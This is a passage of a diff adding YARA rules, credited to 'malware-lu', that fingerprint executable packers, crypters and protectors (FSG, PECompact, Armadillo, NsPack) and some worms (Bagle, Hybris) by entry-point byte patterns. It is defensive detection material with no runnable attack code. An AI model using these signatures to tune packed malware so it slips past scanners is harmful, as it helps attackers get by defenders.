+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ABCCryptor10byZloY
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 FF 64 24 F0 68 58 58 58 58 90 FF D4 50 8B 40 F2 05 B0 95 F6 95 0F 85 01 81 BB FF 68 ?? ?? ?? ?? BF 00 ?? ?? ?? B9 00 ?? ?? ?? 80 37 ?? 47 39 CF 75 F8 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? BF 00 ?? ?? ?? B9 00 ?? ?? ?? 80 37 ?? 47 39 CF 75 F8 }
+
+condition:
+		$a0
+}
+	
+	
+rule FSGv120EngdulekxtMicrosoftVisualC60
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { C1 E0 06 EB 02 CD 20 EB 01 27 EB 01 24 BE 80 ?? 42 00 49 EB 01 99 8D 1D F4 00 00 00 EB 01 5C F7 D8 1B CA EB 01 31 8A 16 80 E9 41 EB 01 C2 C1 E0 0A EB 01 A1 81 EA A8 8C 18 A1 34 46 E8 01 00 00 00 62 59 32 D3 C1 C9 02 EB 01 68 80 F2 1A 0F BE C9 F7 D1 2A D3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SLVc0deProtectorv061SLV
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 02 FA 04 E8 49 00 00 00 69 E8 49 00 00 00 95 E8 4F 00 00 00 68 E8 1F 00 00 00 49 E8 E9 FF FF FF 67 E8 1F 00 }
+	$a1 = { EB 02 FA 04 E8 49 00 00 00 69 E8 49 00 00 00 95 E8 4F 00 00 00 68 E8 1F 00 00 00 49 E8 E9 FF FF FF 67 E8 1F 00 00 00 93 E8 31 00 00 00 78 E8 DD FF FF FF 38 E8 E3 FF FF FF 66 E8 0D 00 00 00 04 E8 E3 FF FF FF 70 E8 CB FF FF FF 69 E8 DD FF FF FF 58 E8 DD FF FF FF 69 E8 E3 FF FF FF 79 E8 BF FF FF FF 69 83 C4 40 E8 00 00 00 00 5D 81 ED 9D 11 40 00 8D 95 B4 11 40 00 E8 CB 2E 00 00 33 C0 F7 F0 69 8D B5 05 12 40 00 B9 5D 2E 00 00 8B FE AC }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule FSG131dulekxt
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE ?? ?? ?? 00 BF ?? ?? ?? 00 BB ?? ?? ?? 00 53 BB ?? ?? ?? 00 B2 80 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RLPackV112V114aPlib043ap0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 33 FF EB 0F FF ?? ?? ?? FF ?? ?? ?? D3 83 C4 ?? 83 C7 ?? 83 3C 37 00 75 EB }
+
+condition:
+		$a0
+}
+	
+	
+rule Crypter31SLESH
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 FF 64 24 F0 68 58 58 58 58 FF D4 50 8B 40 F2 05 B0 95 F6 95 0F 85 01 81 BB FF 68 }
+
+condition:
+		$a0
+}
+	
+	
+rule PseudoSigner01VBOX43MTEAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 0B C0 0B C0 0B C0 0B C0 0B C0 0B C0 0B C0 0B C0 E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MSLRHv032afakeBJFNT13emadicius
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 03 3A 4D 3A 1E EB 02 CD 20 9C EB 02 CD 20 EB 02 CD 20 60 EB 02 C7 05 EB 02 CD 20 E8 03 00 00 00 E9 EB 04 58 40 50 C3 61 9D 1F EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 2B 04 24 74 04 75 02 EB 02 EB 01 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FreeCryptor02build002GlOFF
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 33 D2 90 1E 68 1B ?? ?? ?? 0F A0 1F 8B 02 90 50 54 8F 02 90 90 8E 64 24 08 FF E2 58 50 33 D2 52 83 F8 01 9B 40 8A 10 89 14 24 90 D9 04 24 90 D9 FA D9 5C 24 FC 8B 5C 24 FC 81 F3 C2 FC 1D 1C 75 E3 74 01 62 FF D0 90 5A 33 C0 8B 54 24 08 90 64 8F 00 90 83 C2 08 52 5C 5A }
+
+condition:
+		$a0
+}
+	
+	
+rule PackItBitchV10archphase
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 44 4C 4C 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 ?? 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule nPackv11250BetaNEOx
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 3D 04 ?? ?? ?? 00 75 05 E9 01 00 00 00 C3 E8 46 00 00 00 E8 73 00 00 00 B8 2E ?? ?? ?? 2B 05 08 ?? ?? ?? A3 00 ?? ?? ?? E8 9C 00 00 00 E8 04 02 00 00 E8 FB 06 00 00 E8 1B 06 00 00 A1 00 ?? ?? ?? C7 05 04 ?? ?? ?? 01 00 00 00 01 05 00 ?? ?? ?? FF 35 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UnpackedBSSFXArchivev19
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 1E 33 C0 50 B8 ?? ?? 8E D8 FA 8E D0 BC ?? ?? FB B8 ?? ?? CD 21 3C 03 73 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01VideoLanClientAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 89 E5 83 EC 08 90 90 90 90 90 90 90 90 90 90 90 90 90 90 01 FF FF 01 01 01 00 01 90 90 90 90 90 90 90 90 90 90 90 90 90 90 00 01 00 01 00 01 90 90 00 01 E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01PECompact14Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 EB 06 68 90 90 90 90 C3 9C 60 E8 02 90 90 90 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01DxPack10Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 8B FD 81 ED 90 90 90 90 2B B9 00 00 00 00 81 EF 90 90 90 90 83 BD 90 90 90 90 90 0F 84 00 00 00 00 E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Splice11byTw1stedL0gic
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 00 1A 40 00 E8 EE FF FF FF 00 00 00 00 00 00 30 00 00 00 40 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 01 00 00 00 ?? ?? ?? ?? ?? ?? 50 72 6F 6A 65 63 74 31 00 ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 06 00 00 00 AC 29 40 00 07 00 00 00 BC 28 40 00 07 00 00 00 74 28 40 00 07 00 00 00 2C 28 40 00 07 00 00 00 08 23 40 00 01 00 00 00 38 21 40 00 00 00 00 00 FF FF FF FF FF FF FF FF 00 00 00 00 8C 21 40 00 08 ?? 40 00 01 00 00 00 AC 19 40 00 00 00 00 00 00 00 00 00 00 00 00 00 AC 19 40 00 4F 00 43 00 50 00 00 00 E7 AF 58 2F 9A 4C 17 4D B7 A9 CA 3E 57 6F F7 76 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv140v145
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F A0 40 ?? 87 DD 8B 85 A6 A0 40 ?? 01 85 03 A0 40 ?? 66 C7 85 ?? A0 40 ?? 90 90 01 85 9E A0 40 ?? BB C3 11 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillo300aSiliconRealmsToolworks
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 50 51 EB 0F }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NullsoftInstallSystemv20b4
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 EC 10 53 55 56 57 C7 44 24 14 F0 91 40 00 33 ED C6 44 24 13 20 FF 15 2C 70 40 00 55 FF 15 88 72 40 00 BE 00 D4 42 00 BF 00 04 00 00 56 57 A3 60 6F 42 00 FF 15 C4 70 40 00 E8 9F FF FF FF 8B 1D 90 70 40 00 85 C0 75 21 68 FB 03 00 00 56 FF 15 60 71 40 00 }
+	$a1 = { 83 EC 14 83 64 24 04 00 53 55 56 57 C6 44 24 13 20 FF 15 30 70 40 00 BE 00 20 7A 00 BD 00 04 00 00 56 55 FF 15 C4 70 40 00 56 E8 7D 2B 00 00 8B 1D 8C 70 40 00 6A 00 56 FF D3 BF 80 92 79 00 56 57 E8 15 26 00 00 85 C0 75 38 68 F8 91 40 00 55 56 FF 15 60 71 }
+
+condition:
+		$a0 or $a1
+}
+	
+	
+rule PESHiELDv01bMTE
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B9 1B 01 ?? ?? D1 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule BeRoEXEPackerV100BeRo
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BA ?? ?? ?? ?? 8D B2 ?? ?? ?? ?? 8B 46 ?? 85 C0 74 51 03 C2 8B 7E ?? 8B 1E 85 DB 75 02 8B DF 03 DA 03 FA 52 57 50 FF 15 ?? ?? ?? ?? 5F 5A 85 C0 74 2F 8B C8 8B 03 85 C0 74 22 0F BA F0 1F 72 04 8D 44 ?? ?? 51 52 57 50 51 FF 15 ?? ?? ?? ?? 5F 5A 59 85 C0 74 0B AB 83 C3 04 EB D8 83 C6 14 EB AA 61 C3 }
+
+condition:
+		$a0
+}
+	
+	
+rule MSLRHv32aemadicius
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 2B 04 24 74 04 75 02 EB 02 EB 01 81 83 C4 04 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 3D FF 0F 00 00 EB 01 68 EB 02 CD 20 EB 01 E8 76 1B EB 01 68 EB 02 CD 20 EB 01 E8 CC 66 B8 FE 00 74 04 75 02 EB 02 EB 01 81 66 E7 64 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SpecialEXEPaswordProtectorv101EngPavolCerven
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED 06 00 00 00 89 AD 8C 01 00 00 8B C5 2B 85 FE 75 00 00 89 85 3E 77 00 00 8D 95 C6 77 00 00 8D 8D FF 77 00 00 55 68 00 20 00 00 51 52 6A 00 FF 95 04 7A 00 00 5D 6A 00 FF 95 FC 79 00 00 8D 8D 60 78 00 00 8D 95 85 01 00 00 55 68 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv166
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 3F 90 40 ?? 87 DD 8B 85 E6 90 40 ?? 01 85 33 90 40 ?? 66 C7 85 ?? 90 40 ?? 90 90 01 85 DA 90 40 ?? 01 85 DE 90 40 ?? 01 85 E2 90 40 ?? BB 5B 11 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv167
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 3F 90 40 87 DD 8B 85 E6 90 40 01 85 33 90 40 66 C7 85 90 40 90 90 01 85 DA 90 40 01 85 DE 90 40 01 85 E2 90 40 BB 8B 11 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VIRUSIWormHybris
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 16 A8 54 ?? ?? 47 41 42 4C 4B 43 47 43 ?? ?? ?? ?? ?? ?? 52 49 53 ?? FC 68 4C 70 40 ?? FF 15 }
+
+condition:
+		$a0
+}
+	
+	
+rule GPInstallv50332
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 33 C9 51 51 51 51 51 51 51 53 56 57 B8 C4 1C 41 00 E8 6B 3E FF FF 33 C0 55 68 76 20 41 00 64 FF 30 64 89 20 BA A0 47 41 00 33 C0 E8 31 0A FF FF 33 D2 A1 A0 }
+
+condition:
+		$a0
+}
+	
+	
+rule PseudoSigner02PEIntro10Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8B 04 24 9C 60 E8 14 00 00 00 5D 81 ED 0A 45 40 90 80 BD 67 44 40 90 90 0F 85 48 FF ED 0A }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov410SiliconRealmsToolworks
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 F8 8E 4C 00 68 D0 EA 49 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 65 E8 FF 15 88 31 4C 00 33 D2 8A D4 89 15 7C A5 4C 00 8B C8 81 E1 FF 00 00 00 89 0D 78 A5 4C 00 C1 E1 08 03 CA 89 0D 74 A5 4C 00 C1 E8 10 A3 70 A5 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AverCryptor102betaos1r1s
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED 0C 17 40 00 8B BD 33 18 40 00 8B 8D 3B 18 40 00 B8 51 18 40 00 03 C5 80 30 05 83 F9 00 74 71 81 7F 1C AB 00 00 00 75 62 8B 57 0C 03 95 37 18 40 00 33 C0 51 33 C9 66 B9 F7 00 66 83 F9 00 74 49 8B 57 0C 03 95 37 18 40 00 8B 85 3F 18 40 00 83 F8 02 75 06 81 C2 00 02 00 00 51 8B 4F 10 83 F8 02 75 06 81 E9 00 02 00 00 57 BF C8 00 00 00 8B F1 E8 27 00 00 00 8B C8 5F B8 51 18 40 00 03 C5 E8 24 00 00 00 59 49 EB B1 59 83 C7 28 49 EB 8A 8B 85 2F 18 40 00 89 44 24 1C 61 FF E0 56 57 4F F7 D7 23 F7 8B C6 5F 5E C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FSGv131
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? ?? 53 BB ?? ?? ?? ?? B2 80 A4 B6 80 FF D3 73 F9 33 C9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FSGv133
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE A4 01 40 00 AD 93 AD 97 AD 56 96 B2 80 A4 B6 80 FF 13 73 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule HidePE101BGCorp
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BA ?? ?? ?? 00 B8 ?? ?? ?? ?? 89 02 83 C2 04 B8 ?? ?? ?? ?? 89 02 83 C2 04 B8 ?? ?? ?? ?? 89 02 83 C2 F8 FF E2 0D 0A 2D 3D 5B 20 48 69 64 65 50 45 20 62 79 20 42 47 43 6F 72 70 20 5D 3D 2D }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXEStealthv11
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED FB 1D 40 00 B9 7B 09 00 00 8B F7 AC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Thinstallvxx
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 EF BE AD DE 50 6A ?? FF 15 10 19 40 ?? E9 AD FF FF FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Obsidium1200ObsidiumSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 02 ?? ?? E8 3F 1E 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PrivatePersonalPackerPPP103ConquestOfTroycom
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 19 00 00 00 90 90 E8 68 00 00 00 FF 35 2C 37 00 10 E8 ED 01 00 00 6A 00 E8 2E 04 00 00 E8 41 04 00 00 A3 74 37 00 10 6A 64 E8 5F 04 00 00 E8 30 04 00 00 A3 78 37 00 10 6A 64 E8 4E 04 00 00 E8 1F 04 00 00 A3 7C 37 00 10 A1 74 37 00 10 8B 1D 78 37 00 10 2B D8 8B 0D 7C 37 00 10 2B C8 83 FB 64 73 0F 81 F9 C8 00 00 00 73 07 6A 00 E8 D9 03 00 00 C3 6A 0A 6A 07 6A 00 E8 D3 03 00 00 A3 20 37 00 10 50 6A 00 E8 DE 03 00 00 A3 24 37 00 10 FF 35 20 37 00 10 6A 00 E8 EA 03 00 00 A3 30 37 00 10 FF 35 24 37 00 10 E8 C2 03 00 00 A3 28 37 00 10 8B 0D 30 37 00 10 8B 3D 28 37 00 10 EB 09 49 C0 04 39 55 80 34 39 24 0B C9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VIRUSIWormBagle
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 6A 00 E8 95 01 00 00 E8 9F E6 FF FF 83 3D 03 50 40 00 00 75 14 68 C8 AF 00 00 E8 01 E1 FF FF 05 88 13 00 00 A3 03 50 40 00 68 5C 57 40 00 68 F6 30 40 00 FF 35 03 50 40 00 E8 B0 EA FF FF E8 3A FC FF FF 83 3D 54 57 40 00 00 74 05 E8 F3 FA FF FF 68 E8 03 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule RLPackv118BasicLZMAAp0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 21 0B 00 00 8D 9D FF 02 00 00 33 FF E8 9F 01 00 00 6A 40 68 00 10 00 00 68 00 20 0C 00 6A 00 FF 95 AA 0A 00 00 89 85 F9 0A 00 00 EB 14 60 FF B5 F9 0A }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule StonesPEEncryptorv20
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 53 51 52 56 57 55 E8 ?? ?? ?? ?? 5D 81 ED 42 30 40 ?? FF 95 32 35 40 ?? B8 37 30 40 ?? 03 C5 2B 85 1B 34 40 ?? 89 85 27 34 40 ?? 83 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Upackv029betaDwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 ?? ?? ?? ?? 42 79 44 77 69 6E 67 40 00 00 00 50 45 00 00 4C 01 02 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 29 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner02BJFNT11bAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 01 EA 9C EB 01 EA 53 EB 01 EA 51 EB 01 EA 52 EB 01 EA 56 90 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UPXScramblerRCv1x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 61 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECrypt15BitShapeSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED 55 20 40 00 B9 7B 09 00 00 8D BD 9D 20 40 00 8B F7 AC ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? AA E2 CC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Upackv021BetaDwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE 88 01 ?? ?? AD 8B F8 ?? ?? ?? ?? 33 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UPXFreakV01HMX0101
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE ?? ?? ?? ?? 83 C6 01 FF E6 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UnnamedScrambler20p0ke
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC B9 0A 00 00 00 6A 00 6A 00 49 75 F9 53 56 57 B8 1C 2F 40 00 E8 C8 F1 FF FF 33 C0 55 68 FB 33 40 00 64 FF 30 64 89 20 BA 0C 34 40 00 B8 E4 54 40 00 E8 EF FE FF FF 8B D8 85 DB 75 07 6A 00 E8 5A F2 FF FF BA E8 54 40 00 8B C3 8B 0D E4 54 40 00 E8 74 E2 FF FF C7 05 20 6B 40 00 09 00 00 00 BB 98 69 40 00 C7 45 EC E8 54 40 00 C7 45 E8 31 57 40 00 C7 45 E4 43 60 40 00 BE D3 6A 40 00 BF E0 6A 40 00 83 7B 04 00 75 0B 83 3B 00 0F 86 AA 03 00 00 EB 06 0F 8E A2 03 00 00 8B 03 8B D0 B8 0C 6B 40 00 E8 C1 EE FF FF B8 0C 6B 40 00 E8 6F EE FF FF 8B D0 8B 45 EC 8B 0B E8 0B E2 FF FF 6A 00 6A 1E 6A 00 6A 2C A1 0C 6B 40 00 E8 25 ED FF FF 8D 55 E0 E8 15 FE FF FF 8B 55 E0 B9 10 6B 40 00 A1 0C 6B 40 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule HACKSTOPv100
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { FA BD ?? ?? FF E5 6A 49 48 0C ?? E4 ?? 3F 98 3F }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ExeShield36wwwexeshieldcom
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? ?? 00 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C0 89 08 50 45 43 6F 6D 70 61 63 74 32 00 CE 1E 42 AF F8 D6 CC E9 FB C8 4F 1B 22 7C B4 C8 0D BD 71 A9 C8 1F 5F B1 29 8F 11 73 8F 00 D1 88 87 A9 3F 4D 00 6C 3C BF C0 80 F7 AD 35 23 EB 84 82 6F }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Pe123v200644
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8B C0 EB 01 34 60 EB 01 2A 9C EB 02 EA C8 E8 0F 00 00 00 EB 03 3D 23 23 EB 01 4A EB 01 5B C3 8D 40 00 53 EB 01 6C EB 01 7E EB 01 8F E8 15 01 00 00 50 E8 67 04 00 00 EB 01 9A 8B D8 FF D3 5B C3 8B C0 E8 00 00 00 00 58 83 C0 05 C3 8B C0 55 8B EC 60 8B 4D 10 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SDProtectorV11xRandyLi
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 ?? ?? ?? ?? 68 88 88 88 08 64 A1 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule BobPackv100BoBBobSoft
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 8B 0C 24 89 CD 83 E9 06 81 ED ?? ?? ?? ?? E8 3D 00 00 00 89 85 ?? ?? ?? ?? 89 C2 B8 5D 0A 00 00 8D 04 08 E8 E4 00 00 00 8B 70 04 01 D6 E8 76 00 00 00 E8 51 01 00 00 E8 01 01 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule DBPEv210
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 6A 10 73 0B EB 02 C1 51 E8 06 ?? ?? ?? C4 11 73 F7 5B CD 83 C4 04 EB 02 99 EB FF 0C 24 71 01 E8 79 E0 7A 01 75 83 C4 04 9D EB 01 75 68 5F 20 40 ?? E8 B0 EF FF FF 72 03 73 01 75 BE }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NsPackv31NorthStar
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 9D ?? ?? FF FF 8A 03 3C 00 74 10 8D 9D ?? ?? FF FF 8A 03 3C 01 0F 84 42 02 00 00 C6 03 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 }
+	$a1 = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 9D ?? ?? FF FF 8A 03 3C 00 74 10 8D 9D ?? ?? FF FF 8A 03 3C 01 0F 84 42 02 00 00 C6 03 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 FF 95 ?? ?? FF FF 85 C0 0F 84 6A 03 00 00 89 85 ?? ?? FF FF E8 00 00 00 00 5B B9 68 03 00 00 03 D9 50 53 E8 B1 02 00 00 61 8B 36 8B FD 03 BD ?? ?? FF FF 8B DF 83 3F 00 75 0A 83 C7 04 B9 00 00 00 00 EB 16 B9 01 00 00 00 03 3B 83 C3 04 83 3B 00 74 36 01 13 8B 33 03 7B 04 57 51 52 53 FF B5 ?? ?? FF FF FF B5 ?? ?? FF FF 8B D6 8B CF 8B 85 ?? ?? FF FF 05 AA 05 00 00 FF D0 5B 5A 59 5F 83 F9 00 74 05 83 C3 08 EB C5 68 00 80 00 00 6A 00 }
+
+condition:
+		$a0 at pe.entry_point or $a1
+}
+	
+	
+rule SVKProtectorV13XPavolCerven
+{
+      meta:
+		author="malware-lu"
+strings:
